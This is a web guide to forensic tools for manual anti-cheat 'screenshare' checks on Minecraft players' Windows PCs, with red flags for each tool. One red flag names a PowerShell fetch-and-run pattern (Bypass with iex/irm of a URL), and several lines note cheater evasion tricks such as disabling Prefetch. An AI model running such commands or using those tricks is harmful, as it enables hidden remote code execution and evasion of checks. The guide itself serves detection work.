jorbays.dev
Manual Screenshare
A guide to every tool used during a manual SS, what each one does, and what to look for.
Each tool page covers its purpose, the specific fields or outputs to check, and red flags that indicate something suspicious.
Tools
01
→WinLiveInfo
system info
02
→Meow Doomsday Fucker
memory scanner
03
→TasksParser
scheduled tasks
04
→RedLotus Mod Analyzer
mod scanner
05
→RedLotus Alt Checker
account scanner
06
→BAM Parser
execution history
07
→BAM Reveal
execution history
08
→Espouken
multi-purpose
09
→Fileless
memory / powershell
10
→InjGen
injection detector
11
→Everything
file search
12
→JournalTrace
file activity
14
→PrefetchParser
execution history
15
→PrefetchView++
execution history
16
→System Informer
process analysis
jorbays.dev
Downloads
All tools used during a manual screenshare.
Tools
WinLiveInfo
System hardware and software snapshot
Meow Doomsday Fucker
Doomsday cheat memory scanner
JAR Parser
Minecraft JAR file analyzer
Tasks Parser
Windows scheduled tasks analyzer
RedLotus Mod Analyzer
Minecraft mod verification tool
RedLotus Alt Checker
Account scanner across platforms
BAM Parser
Windows execution history reader
BAM Reveal
Extended BAM with cheat detection
Espouken
Multi-purpose SS utility
Fileless
In-memory PowerShell scanner
InjGen
DLL injection detector
Everything
Instant file search utility
JournalTrace
Windows Change Journal reader
PrefetchParser
Windows Prefetch execution history
PrefetchView++
GUI for Windows Prefetch data
System Informer
Process and system monitor
Paths Parser
File path analysis tool
system info tool
WinLiveInfo
Collects a full hardware snapshot of the target PC to verify the machine is real and not a VM or spoofed setup.
What to check
HyperVisorPresent must be False, confirms no VM is runningHyperVRequirementVirtualizationFirmwareEnabled must be FalseOS install date, note if Windows was installed suspiciously recently
Network adapters, check
CsNetworkAdapters for VPN or virtual adaptersLast boot time via
OsLastBootUpTime, fresh reboots right before a check are suspiciousMotherboard and BIOS serials to verify machine consistency across checks
Red flags
HyperVisorPresent: True, person is likely running a VM to hide cheatsVPN or virtual adapter present, e.g.
x-ovpn-tap in the adapter listWindows installed the same day as the screenshare
Machine rebooted within minutes before the check started
memory scanner
Meow Doomsday Fucker
Scans the memory of running Java processes to detect the Doomsday cheat client.
What to check
Run the Memory Scanner tab while Minecraft is open, it will list all detected Java processes
Output should say
All processes clean. if nothing is foundEach process will show as
javaw [PID] -> clean or -> DETECTEDRed flags
Any process showing
DETECTED in the output means Doomsday was found in memoryOutput says
Doomsday Detected in red next to the Stop buttonOutput line reads
Doomsday sucks., this is the tool confirming a positive detectionscheduled tasks
TasksParser
Parses all Windows scheduled tasks and flags suspicious ones based on signature status.
What to check
Signed column, most legitimate tasks will show
Signed in greenOn Logon column shows tasks that auto-run at login, pay extra attention to these
Red flags
Any task showing
Not signed in orange, especially ones set to run On LogonTasks running from unusual paths like AppData, Temp, or a custom folder
Registry Mismatch flagged, the task on disk does not match what is registered
mod scanner
RedLotus Mod Analyzer
Scans the player's Minecraft mods folder (via memory scan or disk scan) and checks each mod against Modrinth to verify it is a known, legitimate mod.
What to check
Use Memory Scan to automatically detect the running Minecraft process and its mod folder
Each mod should show
Verified in green under the Modrinth columnStatus column should say
Found, the mod file exists where it shouldCheck the mod folder path shown under Generic Information, verify it matches what the player says they use
Red flags
Any mod showing
Unverified, not found on Modrinth, could be a private or cheat modMod status showing
Not Found, the mod was in memory but not on disk, suspiciousMod path pointing to an unexpected location outside the normal profile folder
Mod folder modified after Minecraft launch, shown in red next to the path
account scanner
RedLotus Alt Checker
Scans the system for logged-in Minecraft, Discord, Steam, and other accounts to identify alts or secondary accounts the player may not have disclosed.
What to check
Use Target Scan with the player's username to search across all platforms at once
Minecraft Scan will show all Java and Bedrock accounts cached on the machine
Review the Accounts Found tab, cross-reference every account shown with the player's known alts
Check the Forensics tab for deeper evidence of account activity
Red flags
Accounts found that the player has not disclosed or claims not to own
Multiple Minecraft accounts on the same machine, could indicate ban evasion alts
Discord or Steam accounts with different usernames that do not match the player's known identity
execution history
BAM Parser
Reads the BAM registry to show every executable that has been run on the machine, with timestamps and signatures.
What to check
Review the Last Execution timestamps, focus on anything run around the time of the SS or recently before it
Signature column, most legitimate programs will show
SignedUse the Not Signed Only and Flagged Only filters to narrow down suspicious entries quickly
Red flags
Unsigned executables run from AppData, Temp, Desktop, or non-standard paths
Entries marked
Deleted in the Signature column, the file was run then removed.Known cheat-related filenames in the path (e.g. injector, loader, client names)
execution history
BAM Reveal
Similar to BAM Parser but with additional detection capabilities, shows generics tags, fake signatures, and cheat labels alongside execution history.
What to check
Signature column, look for
Signed, Unsigned, Fake Signature, or Cheat labelsUse Post-Logon, Show Untrusted, and Show Not Found filters to shorten results
Check Registry BAM and Deleted BAM tabs for historical and removed entries
Red flags
Any entry labelled
Cheat in the Signature column, direct detectionEntries with
Fake Signature, the executable was signed with an invalid or spoofed certUnsigned executables run from Downloads, Desktop, or temp locations shortly before the SS
multi-purpose
Espouken
A tool with scan modes including time change detection, unicode string scanning, MC alt checking, HWID display, and service start time analysis.
What to check
Show services start times, compare service start times against the system boot time to detect anything that started unexpectedly late
Scan for time changes, detects if the system clock was manipulated
Scan for unicode strings, can surface obfuscated or hidden text in memory
Show HWID, use to verify hardware ID consistency across multiple checks
Red flags
Services that started significantly later than boot time with no clear reason
DPS service stopped or disabled, this logs diagnostic activity and is commonly disabled by cheaters
Evidence of clock manipulation from the time change scan
memory / powershell
Fileless
Scans for fileless execution techniques, PowerShell commands that were run entirely in memory and never saved to disk, which cheats sometimes use to avoid leaving traces.
What to check
The tool outputs any suspicious PowerShell commands it finds in memory after the logon time
Review each flagged command, check what URL or script it was trying to run
Logon time is shown at the top, only events after this are relevant
Red flags
PowerShell commands using
-ExecutionPolicy Bypass and iex (irm 'url') to download and run scripts from the internetCommands referencing known cheat or screenshare-bypass GitHub repos
Multiple suspicious commands found, indicates the player ran several in-memory scripts
injection detector
InjGen
Scans the running Minecraft process for injected DLLs, suspicious native modules, and known cheat client strings loaded into memory.
What to check
Tool automatically finds the
javaw.exe PID and scans itSuspicious Modules section lists any DLLs loaded into the process that are not standard
Client strings section shows any known cheat client identifiers found in memory
Red flags
Output says
Injection detected in untested game client, a DLL was injected into the processKnown cheat client strings found, e.g. Doomsday-specific identifiers in the client strings section
Unexpected DLLs with JNI flags loaded from non-standard paths inside the Minecraft process
file search
Everything
File system search that indexes every file and folder, letting you find any file by name, path, faster than windows search.
What to check
Search for common cheat-related extensions:
.dll, .jar, .batUse date filters to shorten results to files created or modified around the SS time
Search known cheat client names, injector keywords, or loader filenames directly
Check recently created folders in unusual locations like
C:\Users\Public or root of C:Red flags
Cheat-related filenames anywhere on the system, even if the file no longer exists on disk
DLL files sitting in
AppData\Roaming, AppData\Local\Temp, or the Minecraft directory with no recognisable nameRecently created
.bat files often used as cleanup or launch scripts by cheat loadersfile activity
JournalTrace
Reads the Windows Change Journal (USNJRNL), a log the OS keeps of every file create, modify, rename, and delete event on a volume. Shows what happened on disk even if the files are gone.
What to check
Filter events to around the time of the SS, look for create and delete pairs that happened close together
Look for file rename events, a common cleanup technique to hide what was previously run
Cross-reference deleted filenames with known cheat file names or paths flagged by other tools
Check for bulk deletions in AppData or Temp shortly before the session started
Red flags
A file was created and deleted within minutes
Rename chains where a file had multiple name changes in a short period, suggests active obfuscation
Mass deletion events in
AppData or Temp immediately before Minecraft launchedKnown cheat filenames appearing in the journal even if the file is no longer present on disk
execution history
PrefetchParser
Parses Windows Prefetch files (C:\Windows\Prefetch\*.pf) to produce a timeline of every executable that ran on the machine, including first run, last run, and run count. Prefetch persists even after the file is deleted.
What to check
Check last run timestamps against the SS time, focus on anything executed within the same session window
Run count column, a count of 1 with a timestamp right before the SS suggests a one-time tool run then removed
Cross-reference executable names against known cheat tool and injector filenames
Check referenced files inside each prefetch entry, can reveal what DLLs or configs the executable loaded
Red flags
Prefetch entry for a known cheat tool or injector name, even if the file itself has since been deleted
Single-run executables with generic or randomised names run immediately before Minecraft launched
Referenced DLL paths inside a prefetch entry pointing to AppData, Temp, or non-standard locations
Prefetch disabled entirely, hackers sometimes disable it to prevent this tool from being used
execution history
PrefetchView++
A GUI for Windows Prefetch data. Presents the same execution history as PrefetchParser in a sortable, filterable interface. Takes longer to load which is why PrefetchParser is preferred
What to check
Sort by Last Run time and work backwards from the SS timestamp to identify what ran in the lead-up
Use the Run Count column to spot single execution programs
Click any entry to view the full list of files and DLLs it referenced during that run
Red flags
Executable names with randomised strings, e.g.
xG7f2k.exe, run once and never againReferenced file paths inside an entry that include known cheat directory names or temp paths
process analysis
System Informer
A process and system monitor which shows every running process with its loaded DLLs, network connections, memory maps, and signature status.
What to check
Find
javaw.exe in the process list, expand it and open the Modules tab to see every DLL loaded into MinecraftCheck the Handles tab for open file handles pointing to unusual paths, can reveal what files a process is actively reading
Network tab shows all active connections per process, verify Minecraft is only connecting to expected Mojang or server IPs
Check the Memory tab for regions marked as executable but with no associated module, a sign of injected shellcode
Signature column in the process list flags unsigned or tampered executables at a glance
Use the Strings search on
javaw.exe memory, filter by the player's active mods folder path to surface any mod paths still referenced in memory after being deleted or moved off diskRed flags
DLLs loaded into
javaw.exe that are unsigned or originate from outside the JRE or Minecraft directoriesExecutable memory regions inside the Minecraft process with no mapped module, indicates manual code injection
Unexpected outbound connections from
javaw.exe to IPs or domains unrelated to the game server or MojangAny process running with a parent that makes no logical sense, e.g. a loader spawned by
explorer.exe right before Minecraft started